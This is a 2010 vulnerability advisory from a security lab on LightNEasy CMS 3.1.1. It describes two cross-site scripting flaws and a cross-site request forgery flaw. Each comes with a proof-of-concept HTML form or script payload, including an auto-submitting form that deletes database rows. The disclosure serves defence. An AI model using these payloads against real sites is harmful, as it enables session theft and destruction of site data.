Multiple Vulnerabilities in LightNEasy CMS
| Advisory ID: | HTB22387 |
| Product: | LightNEasy CMS |
| Vendor: | Fernando Baptista |
| Vulnerable Versions: | 3.1.1 and Probably Previous Versions and probably prior |
| Tested Version: | 3.1.1 and Probably Previous Versions |
| Advisory Publication: | May 18, 2010 [without technical details] |
| Vendor Notification: | May 18, 2010 |
| Public Disclosure: | June 1, 2010 |
| Vulnerability Type: | Cross-Site Scripting [CWE-79]
Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352] |
| Risk Level: | Medium |
|  |
| CVSSv2 Base Scores: | 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) |
| Solution Status: | Fixed by Vendor |
| Discovered and Provided: | High-Tech Bridge Security Research Lab |
|
Advisory Details: |
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in LightNEasy CMS which could be exploited to perform script insertion, cross-site scripting and cross-site request forgery attacks.
1) Cross-site scripting (XSS) vulnerability in LightNEasy CMS
1.1 The vulnerability exists due to input sanitation error in the "footer" parameter in LightNEasy/admin.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires victim to be logged-in as an administrator.
Exploitation example:
<form action="http://host/LightNEasy.php?do=setup" method="post" name="main">
<input type="hidden" name="password" value="" />
<input name="admin" type="hidden" value='admin' />
<input type="hidden" name="email" value="example@example.com" />
<input type="hidden" name="wemail" value="example@example.com" />
<input type="hidden" name="restricted" value="" />
<input type="hidden" name="homepath" value="./" />
<input type="hidden" name="template" value="lightneasy" />
<input type="hidden" name="title" value="site title" />
<input type="hidden" name="subtitle" value="site subtitle" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="author" value="" />
<input type="hidden" name="footer" value='hello"><script>alert(document.cookie)</script>' />
<input type="hidden" name="timeoffset" value="0" />
<input type="hidden" name="dateformat" value="%m/%d/%y - %I:%M %p" />
<input type="hidden" name="indexfile" value="LightNEasy.php" />
<input type="hidden" name="language" value="en_US" />
<input type="hidden" name="langeditor" value="en" />
<input type="submit" name="submit" value="Save Setup" id="mybtn" />
</form>
<script>
document.getElementById("mybtn").click();
</script>
2) Script insertion vulnerability in LightNEasy CMS
An input sanitation error exists in the "commentmessage" field in LightNEasy/common.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when the user reads published comments.
Exploitation example:
The attacker can leave his comment on the following page:
"http://host/LightNEasy.php?page=news"
And fill in the form as follows:
Your name: example
Your e-mail: example@example.com
Your comment: <script>alert(document.cookie)</script>
Code: Enter Captcha code
After the comment is published the malicious code will be executed on the following page:
http://example.com/LightNEasy.php?page=news&id=1&showcomments=1
3) Cross-site request forgery (CSRF) in LightNEasy CMS
The vulnerability exists due to insufficient validation of the request origin in LightNEasy/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary SQL commands in application`s database.
Exploitation example:
<form action="http://host/LightNEasy.php?do=database" method="post" name="main">
<input type="hidden" name="query" value="delete from lne_menu where m3=1" />
<input type="submit" name="submit" value="Query Database" id="mybtn" />
</form>
<script>
document.getElementById("mybtn").click();
</script> |
- GDPR & PCI DSS Test
- Website CMS Security Test
- CSP & HTTP Headers Check
- WordPress & Drupal Scanning
Try For Free
Solution: |
| Vulnerability #2 was fixed in version 3.2 |
| |
References: |
[1] High-Tech Bridge Advisory HTB22387 - https://www.immuniweb.com/advisory/HTB22387 - Multiple Vulnerabilities in LightNEasy CMS
[2] LightNEasy CMS - www.lightneasy.org - LightNEasy is a simple to use Content Management System that will allow you to make a website literally in minutes.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. |
|
Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
